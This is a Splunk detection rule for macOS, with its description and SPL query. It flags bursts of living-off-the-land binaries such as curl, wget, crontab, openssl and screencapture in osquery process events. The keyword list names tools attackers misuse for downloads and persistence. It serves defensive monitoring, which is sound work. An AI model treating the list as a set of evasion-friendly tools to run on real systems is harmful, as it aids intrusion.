splApache-2.0from splunk/security_content

MacOS LOLbin

The following analytic detects multiple executions of Living off the Land (LOLbin) binaries on macOS within a short period. It leverages osquery to monitor process events and identifies commands such as "find", "crontab", "screencapture", "openssl", "curl", "wget", "killall", and "funzip". This activity is significant as LOLbins are often used by attackers to perform malicious actions while evading detection. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.

Quality

FP risk

—

Forks

Views

Rule sourcedetections/endpoint/macos_lolbin.yml

`osquery_macro`
name=es_process_events
columns.cmdline IN (
    "chmod*",
    "crontab*",
    "curl*",
    "find*",
    "funzip*",
    "killall*",
    "openssl*",
    "screencapture*",
    "wget*",
)
| rename columns.* as *
| stats count min(_time) as firstTime
              max(_time) as lastTime
              values(cmdline) as cmdline
              values(pid) as pid
              values(parent) as parent
              values(path) as path
              values(signing_id) as signing_id
              dc(path) as dc_path
    BY username host

| rename username as user
        cmdline as process
        path as process_path
        host as dest

| where dc_path > 3
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `macos_lolbin_filter`